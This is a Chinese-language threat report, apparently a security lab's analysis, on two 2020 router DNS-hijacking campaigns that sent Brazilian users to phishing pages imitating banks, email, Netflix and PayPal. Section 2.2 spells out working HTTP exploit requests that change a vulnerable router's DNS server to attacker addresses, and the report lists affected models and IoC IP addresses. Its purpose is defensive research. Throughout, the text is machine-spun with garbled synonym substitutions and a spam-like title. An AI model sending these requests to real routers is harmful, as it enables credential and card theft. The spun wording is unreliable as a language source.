php攻击马垂纶新手腕劫持你家路由器

攻击者进行DNS挟制的流程为：首先对暴露在互联网上的存在未授权DNS修正漏洞的路由器进行攻击，将其DNS做事器地址改为攻击者的恶意DNS做事器；之后，当用户访问攻击者挟制的域名时，会访问到钓鱼网站，页面中会勾引用户输入账号密码、银行卡号等敏感信息；末了，攻击者利用网络到的敏感信息获利。

本文的关键创造如下：

2020年至今，我们共捕获到2起DNS挟制事宜。
第一起攻击紧张集中在5月24日，攻击源只有1个，第二起攻击在8月18日首次被我们捕获到，截至笔者行文，该攻击还在进行中。

php攻击马垂纶新手腕劫持你家路由器 CSS

在第一起挟制事宜中，攻击源在短韶光内进行了环球范围的攻击，目标端口是80和8080，共利用了4类远程DNS修正（Remote DNS Change）漏洞。

在第二起挟制事宜中，攻击者从8月18日起持续进行环球范围的攻击，目标端口是80、81、82、8080和8182，攻击者仅利用了一种攻击办法，但是，我们在Exploit-DB中共创造18条干系的漏洞信息，涉及多个厂商的路由器。

第二起攻击的攻击源有27个，77.8%的攻击源位于荷兰，别的攻击源位于美国。
这些IP均来自同一ASN（AS14061），所属ISP为DIGITALOCEAN-ASN。
绿盟威胁情报中央的数据显示，85.2%的IP有IDC标签。

发生DNS挟制后，路由器的首选DNS做事器会被修改为149.56.152.185。
我们对Alexa排名前 1万的域名解析数据进行了剖析，创造攻击者的攻击目标紧张为电子邮箱、银行和通用的娱乐、电商、支付平台类网站。
采集的个人信息包括电子邮箱账户、支票账户、网络银行账号、银行卡号和干系银行卡信息及其密码等。
攻击者挟制的大部分域名为巴西的域名，并且我们创造了用葡萄牙语编写的代码，因此，我们判断攻击者的攻击目标以巴西为主，并且攻击者很有可能是巴西人。

我们利用绿盟威胁情报中央的资产数据对潜在受影响的设备分布情形进行了评估。
我们创造真正暴露在巴西的紧张是Beetel公司的BCM96338这一型号的路由器，但其暴露数量也仅为361台。
假定不存在未被识别出的设备，那么本次DNS挟制事宜对巴西的影响有限。
但是由于攻击者的扫描是环球范围的，其他国家的设备的DNS也存在被修改的可能。
不过即便被修改，根据我们对挟制目标的剖析，其他国家受影响的用户的数据透露的可能性也比较小。

由于厂商设备型号浩瀚，未被表露的型号同样可能存在相同的漏洞。
从厂商角度来看，TP-LINK、ASUS和D-Link路由器的环球暴露数量均超过百万，而在巴西，这三个厂商的设备也有一定的暴露面。

针对DNS挟制的防护，我们建议，在网页涌现非常时提高当心，为系统指定DNS做事器，及时将路由器固件升级为最新版本等。

1. 简介

1.1 什么是DNS挟制

DNS，即Domain Name System（域名系统）[1]，是一种将域名解析为打算机能够识别的网络地址（IP地址）的系统，是Internet的主要组成部分。
DNS挟制指DNS做事器的拥有者（或攻击者）恶意将某域名指向缺点的IP。

1.2 DNS挟制的危害

DNS挟制危害紧张有以下五点：

（1）无法访问某些域名，表现为连接超时等。

（2）访问某些域名时跳转到其他网站，如访问Google却跳转到百度页面。

（3）当访问到缺点的域名时，跳转到广告页面。

（4）访问某些域名时，页面增加了广告信息。
紧张针对静态网页。

（5）挟制到模拟真实网站做成的假网站，从而盗取用户名、密码乃至银行卡卡号、密码等恶意行为。
很多情形下难辨真伪。

前四点会为用户带来糟糕的体验，以及为DNS拥有者带来一笔不菲的收入。
而末了一点直接威胁到用户的数据乃至财产安全，是非常严重的。

1.3 DNS挟制是如何发生的

DNS挟制的发生，紧张有两种可能：

（1）ISP（网络做事供应商）供应的DNS涌现问题，或是趋于利益，或是遭到攻击。

（2）设备（路由器、用户设备等）的DNS干系设置被恶意修改。

2. DNS挟制威胁剖析

2.1 攻击趋势剖析

我们对DNS挟制干系日志进行了剖析，如图 2.1 所示，2020年至今，我们共捕获到2起DNS挟制行为。
第一起攻击紧张集中在5月24日，攻击源只有1个，第二起攻击在8月18日首次被我们捕获到，截至笔者行文，该攻击还在进行中。
本章也将紧张对第二起攻击进行剖析。

图 2.1 DNS挟制攻击趋势剖析

2.2 攻击手腕

2.2.1 第一起DNS挟制事宜

在第一起挟制事宜中，攻击源只有一个，在短韶光内进行了环球范围的攻击，目标端口是80和8080，共利用了4类远程DNS修正（Remote DNS Change）漏洞。

漏洞1：

攻击手腕：

GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1

目标端口：80、8080

目标设备：我们在Exploit-DB中共创造18条干系的记录[①]，涉及多个厂商的路由器，包括D-Link、UTstarcom、Beetel、iBall Baton、Tenda、Pirelli、Exper、ASUS、COMTREND、PLANET、inteno、TP-LINK、Shuttle Tech等。

漏洞2：

攻击手腕：

GET /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8

目标端口：80、8080

目标设备：D-Link DSL-2640R（EDB-ID: 43678）、DSL-2740R（EDB-ID: 35917）。

漏洞3：

攻击手腕：

GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP

目标端口：80、8080

目标设备：D-Link DSL-2640B（EDB-ID: 36105）。

漏洞4：

攻击手腕：

GET /goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=111.90.159.53&DS2=8.8.8.8 HTTP/1.1

目标端口：8080

目标设备：我们在Exploit-DB中共创造7条干系的记录，涉及多个厂商的路由器，包括Secutech、Tenda、Unicon等。

2.2.2 第二起DNS挟制事宜

在第二起挟制事宜中，攻击源有27个，8月18日起持续进行环球范围的攻击，目标端口是80、81、82、8080和8182，攻击办法唯一，采取了上一节提到的漏洞1。

攻击手腕：

GET /dnscfg.cgi?dnsPrimary=149.56.152.185&dnsSecondary8.8.4.4&dnsDynamic=0&dnsRefresh=1

从上述攻击手腕中我们也可以看到，攻击者在dnsSecondary和8.8.4.4之间忘却写“=”了，这将导致目标设备的dnsSecondary并不会被攻击者所改变。

2.3 攻击源剖析

解释：本节的攻击源剖析仅针对第二起攻击。

2.3.1 攻击源国家分布

我们共捕获到27个攻击源的DNS修改行为，这些攻击源分布很集中，77.8%的攻击源位于荷兰，别的攻击源位于美国。
我们创造这些IP均来自同一ASN（AS14061），所属ISP为DIGITALOCEAN-ASN。
绿盟威胁情报中央的数据显示，85.2%的IP均有IDC标签。
因此，一个合理的推测是，这些IP存在漏洞，被攻击者攻破后进行DNS挟制攻击。

2.3.2 攻击源开放端口分布

图 2.2 是攻击源紧张开放的端口的分布情形，这些攻击源中，大部分开放了22、443和80端口。

图 2.2 攻击源紧张开放端口分布情形

2.4 攻击者做事器信息

目前已知存在DNS挟制征象的做事器地址是149.56.152.185，通过遍历Alexa的Top1M域名列表[2]的前一万域名，找到了部分非常情形，这些域名被挟制到了攻击者的IP。
在一段韶光内，我们检测到这个IP是在变革的，依次为：149.56.79.208、107.23.99.48、149.56.79.215。
截止发文时，末了一个IP仍旧生动。

149.56.152.185、149.56.79.208、149.56.79.215位于加拿大魁北克省博阿努瓦，运营商为ovh.com。
107.23.99.48位于美国弗吉尼亚州阿什本，运营商amazon.com。
表 2.1 和表 2.2 分别是149.56.152.185和149.56.79.215的端口开放情形。

表 2.1 149.56.152.185端口开放情形

表 2.2 149.56.79.215端口开放情形

2.5 DNS挟制目标剖析

攻击目标紧张为巴西电子邮箱类、银行类，还有和财产干系的通用娱乐电商支付平台类。
采集的个人信息包括电子邮箱账户、支票账户、网络银行账号、银行卡号和干系银行卡信息及其密码等。
其余，还有CPF码（巴西纳税人标识）以及持卡人姓名等，是巴西纳税人的主要信息。
可见攻击者目标明确，对财产方面感兴趣。
其余我们把稳到[3]，有攻击者在2019年3月，也对类似的域名进行过挟制。

所有的假页面有一些共同点：

一是HTML构造大略，险些无CSS，而用整页图片替代；

二是采取PHP天生网页，还有少量JavaScript文件用于检测输入信息的合法性；

三是仅有上岸功能可用，别的大部分超链接无法利用或者链接到404页面；

四是均为HTTP协议，无法通过HTTPS访问；

五是大部分网页为葡萄牙语（巴西官方措辞），被攻击的域名也以巴西域名（br后缀）为主，且创造了用葡萄牙语编写的代码，预测攻击者为巴西人可能性较大。

以下为详细案例：

a) outlook.com，Outlook邮箱

打开后显示葡萄牙语登录页面。
随意输入邮箱和密码后跳转到br.msn.com，并提示找不到做事器IP。
预测攻击者希望跳转到真实页面，但未实现。

b) live.com，Outlook邮箱

同上。

c) msn.com，MSN门户

显示为Outlock邮箱上岸页面，同上。

d) terra.com.br，Terra邮箱（巴西）

主页所有链接打开后均为404，可以输入用户名和密码，输入后点击登录仍跳回主页。

e) bradesco.com.br，Bradesco银行（巴西）

打开主页仅有顶部可用，哀求输入机构编号和用户支票账号，点击ok后跳转到404页面。
（预测是攻击者尚未配置完毕）

f) caixa.gov.br，CAIXA银行（巴西）

图 2.3 CAIXA银行的真实页面（上）和攻击者假造页面（下）

图 2.3 是巴西CAIXA银行的真实页面和攻击者假造页面，虽然看起来很像，但后者仅有上岸功能。

访问被挟制页面，主页仅有一个上岸按钮，别的为纯挚图片，点击无反应。

点进去后哀求输入用户名，并选择个人、法人或政府。
用户名哀求10至20位。
随意输入即可进入到下一级。

哀求输入网络银行密码。
页面弹窗提示用网页的虚拟键盘录入，但实际上仅能通过键盘录入。
这该当是攻击者尚未完善。
随意输入进入下一级。

称当前打算机须要登记后才能访问，阅读后进入下一级。

哀求输入CPF码（巴西纳税人码）、银行卡号、打算机昵称。
这里CPF有合法性检讨，我们编造了一个合法的CPF: 12345836407，成功进入下一级。
值得一提的是，此处检讨CPF合法性的JavaScript，利用葡萄牙语编写的，预测攻击者为巴西人可能性较大。

选择打算机登记韶光：永久、1至365天、仅此一次，选择后进入下一级。

显示打算机成功登记。
进入下一级。

哀求输入数字密码。
限定六位，随意输入进入下一级。

确认数字密码，限定六位，无需与上次相同，提示成功，然后显示为一片空缺。

g) santander.com.br，Santander银行（巴西）

图 2.4 Santander银行的真实页面（上）和攻击者假造页面（下）

图 2.4 是巴西Santander银行的真实页面和攻击者假造页面，后者仅有上岸功能。
其主页供应两种上岸办法：CPF码或机构编号、用户支票账号。

CPF码有合法性检讨，编造了合法的CPF 12345836407后哀求输入上岸密码，随意输入后哀求输入电话号码、CVV码、6位或8位超级数字密码（姑且这样翻译吧，实在看不懂葡萄牙语）、4位数字密码。
随意输入后哀求输入密码卡，包含50个4位数和卡号。
随意输入后哀求输入卡号和签发日期，日期有合法性检讨。
随后显示成功信息。

随意输入机构编号、用户支票账号后跳转到上岸页面，哀求输入用户名和密码。
随意输入后进入下一级，显示先前输入的支票账号，哀求输入支票密码、设备序列号和令牌（这该当是一种安全验证设备）。
知足位数限定，随意输入后显示成功开通网上银行。

h) santandernet.com.br，Santander银行（巴西）

同上。

i) itau.com.br，Itau银行（巴西）

所采集信息基本与上银行网站同，不做赘述。

j) bb.com.br，巴西银行

所采集信息基本与上银行网站同，不做赘述。

k) citibank.com，花旗银行

404 Not Found。
预测是攻击者尚未配置完毕。

l) netflix.com，Netflix视频网站

图 2.5 攻击者假造的Netflix页面

图 2.5 是攻击者假造的Netflix页面，哀求填写银行卡信息，打开主页后只有登录按钮可用，别的跳转到404页面。
这里在一段韶光内创造两种情形：

点击登录后提示可免费获取一个月会员，哀求输入邮箱和密码。
随意输入后进入下一级，哀求输入银行卡信息，包含名、姓、CPF、卡号、签发日期、CVV码。
随意输入后提示成功。

点击登录后哀求输入邮箱和密码，提示用户被停息，须要验证账户，哀求输入银行卡信息，包含名、姓、CPF、卡号、签发日期、CVV码。
随意输入后提示成功。

m) Americanas.com.br, Americanas电商平台（巴西）

图 2.6 Americanas电商平台的真实页面（上）和攻击者假造页面（下）

图 2.6 是Americanas电商平台的真实页面和攻击者假造页面，两者差异明显。
点击登录，哀求输入用户名（邮箱）和Americanas密码。
提示可以兑换优惠券，哀求输入银行卡号、签发日期、持卡人姓名、CVV码。
随意输入后显示优惠券码。
无论如何操作总显示同一优惠券码。

n) paypal.com， PayPal支付平台

图 2.7 攻击者假造的PayPal页面

图 2.7 是攻击者假造的PayPal页面，主页显示英文界面，点击登录，哀求输入邮箱、密码、全名、生日、国家、住址、城市、邮编、银行卡号、签发日期、CVV码、密码。

2.6 潜在受影响设备暴露情形剖析

通过Exploit-DB，我们可以获取存在远程DNS修正漏洞的设备厂商和型号，因此，本节将从这两个角度对潜在受影响的设备进行评估，数据来自绿盟威胁情报中央。
由于挟制目标与巴西有关，除剖析环球受影响情形外，我们也对巴西的受影响设备的分布情形进行了剖析。

图 2.8 是潜在受影响的设备型号的分布情形，在我们可识别的设备中，真正暴露在巴西的紧张是Beetel公司的BCM96338这一型号的路由器，但其暴露数量也仅为361台。
从这个角度来看，假定不存在未被识别出的设备，那么本次DNS挟制事宜对巴西的影响有限。
但是由于攻击者的扫描是环球范围的，其他国家的设备的DNS也存在被修改的可能，不过即便被修改，根据我们对挟制目标的剖析，其他国家受影响的用户的数据透露的可能性也比较小。

图 2.8 潜在受影响设备暴露情形（设备厂商-型号）

图 2.9 是潜在受影响的设备厂商的分布情形，之以是从这个角度来考虑，是由于Exploit-DB的数据仅为互联网上表露出来的数据，但一个厂商设备型号浩瀚，未必会被全面进行测试，未被表露的型号同样可能存在相同的漏洞。
从图 2.9 可以看出，TP-LINK、ASUS和D-Link路由器的环球暴露数量均超过百万，而在巴西，这三个厂商的设备也有一定的暴露面。
但是这些设备有多少的DNS可被修改，我们就没有进行验证了。

图 2.9 潜在受影响设备暴露情形（设备厂商）

3. 小结

本文首先对DNS挟制的成因和危害进行了先容，之后先容了今年我们捕获到的两起DNS挟制事宜。

针对DNS挟制的防护，我们有如下建议：

当创造网页涌现非常时，如加载速率慢、显示非常、功能缺失落、哀求录入个人信息等，立即停滞访问，改换网络环境或手动配置DNS后再试。

只管即便利用HTTPS访问网站。
当HTTPS证书缺点或仅能通过HTTP访问时，谨慎操作，提高当心（但这也有可能是管理员的轻忽导致的）。

一样平常情形下，系统（尤其Windows）自动选择DNS做事器时，会采取上级所供应的。
路由器也会以采取上级供应的DNS，即ISP（网络做事供应商）的DNS做事器。
如果路由器DNS因某些缘故原由被修改时，下属设备就会受到影响。
这种情形下只须要为系统指定DNS做事器即可避免DNS挟制攻击。
这里列举一些公认的DNS做事器[4]，详细延迟还须要自行测试，挑选速率快、稳定的DNS即可。

表 3.1 常用DNS做事器列表

防止路由器DNS设置被修改是“治本”的方法。
首先避免利用默认上岸密码（如admin, guest等）和弱密码（如123456, 88888888等）；定期更新路由器固件，留神路由器厂商公布的漏洞信息，防止被黑客骇入；如果有条件，不把路由器IP（尤其是管理页面）暴露在公网，为攻击者留下可乘之机。
限于IPv4地址数量，我国大部分家用宽带无法分得公网IP，且运营商封禁了常用web端口（80, 8080, 443），也在一定程度上规避了发生的风险。

如果你追求更安全纯净的DNS做事，DoT(DNS over TLS)和DoH(DNS over HTTPS)或许是更好的选择，代价是耗费更长的韶光。
本文不做赘述。

4. IoC

4.1 第一起DNS挟制事宜

攻击源：

51.159.71.63

恶意DNS做事器：

111.90.159.53

4.2 第二起DNS挟制事宜

攻击源：

134.209.194.220

134.209.205.83

157.245.69.183

161.35.82.213

161.35.90.137

165.22.206.34

167.172.47.178

178.62.204.69

178.62.205.16

178.62.206.207

178.62.208.183

178.62.208.240

178.62.211.51

178.62.227.36

178.62.244.184

178.62.244.210

178.62.244.220

178.62.244.234

178.62.244.245

178.62.245.27

178.62.245.40

188.166.24.138

188.166.26.148

188.166.29.118

188.166.29.173

64.225.66.217

64.225.78.202

恶意DNS做事器：

149.56.152.185

参考文献

[1] Domain Name System, https://en.wikipedia.org/wiki/Domain_Name_System

[2] Alexa Top 1M, http://s3.amazonaws.com/alexa-static/top-1m.csv.zip

[3] PayPal, Netflix, Gmail, and Uber users among targets in new wave of DNS hijacking attacks, https://www.ixiacom.com/company/blog/paypal-netflix-gmail-and-uber-users-among-targets-new-wave-dns-hijacking-attacks

[4] 天下各地DNS做事器地址大全, http://ip.yqie.com/dns.htm

关于格物实验室格物实验室专注于工业互联网、物联网和车联网三大业务场景的安全研究。
致力于以场景为导向，智能设备为中央的漏洞挖掘、研究与安全剖析，关注物联网资产、漏洞、威胁剖析。
目前已发布多篇研究报告，包括《物联网安全白皮书》、《物联网安全年报2017》、《物联网安全年报2018》、《物联网安全年报2019》、《海内物联网资产的暴露情形剖析》、《智能设备安全剖析手册》等。
与产品团队联合推出绿盟物联网安全风控平台，定位运营商行业物联网卡的风险管控；推出固件安全检测平台，以便快速创造设备中可能存在的漏洞，以避免因弱口令、溢出等漏洞引起设备掌握权限的透露。
关于伏影实验室

伏影实验室专注于安全威胁与监测技能研究。
研究目标包括僵尸网络威胁，DDoS对抗，WEB对抗，盛行做事系统薄弱利用威胁、身份认证威胁，数字资产威胁，玄色家当威胁及新兴威胁。
通过掌控现网威胁来识别风险，缓解威胁侵害，为威胁对抗供应决策支撑。

绿盟威胁捕获系统

网络安全发展至今特殊是随着威胁情报的兴起和虚拟化技能的不断发展，欺骗技能也越来越受到各方的关注。
欺骗技能便是威胁捕获系统关键技能之一。
它的高保真、高质量、鲜活性等特色，使之成为研究仇敌的主要手段，同时实时捕获一手威胁韶光不再具有滞后性，非常适宜威胁情报的时效性需求。

绿盟于2017年中旬运营了一套威胁捕获系统，发展至今已逐步成熟，感知节点遍布天下五大洲，覆盖了20多个国家，覆盖常见做事、IOT做事，工控做事等。
形成了以全端口仿照为根本，智能交互做事为辅的稠浊型感知架构，每天从互联网中捕获大量的鲜活威胁情报，实时感知威胁。

[①] 我们在Exploit-DB中对关键词“DNS change”进行检索，并对结果进行了分类整理。